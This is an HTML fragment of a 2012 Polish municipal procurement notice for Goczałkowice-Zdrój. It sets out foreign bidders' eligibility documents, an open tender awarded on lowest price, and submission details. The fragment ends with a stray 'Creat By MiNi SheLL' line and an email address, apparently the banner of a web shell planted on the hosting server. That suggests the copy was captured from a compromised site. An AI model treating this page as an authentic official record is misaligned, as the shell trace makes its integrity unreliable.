<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.goczalkowicezdroj.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego tj, Urząd Gminy Goczałkowice-Zdrój, ul. Szkolna 13, 43-230 Goczałkowice-Zdrój, pokój nr 213.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.12.2012 godzina 08:30, miejsce: Urząd Gminy Goczałkowice-Zdrój, ul. Szkolna 13, 43-230 Goczałkowice-Zdrój, sekretariat I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com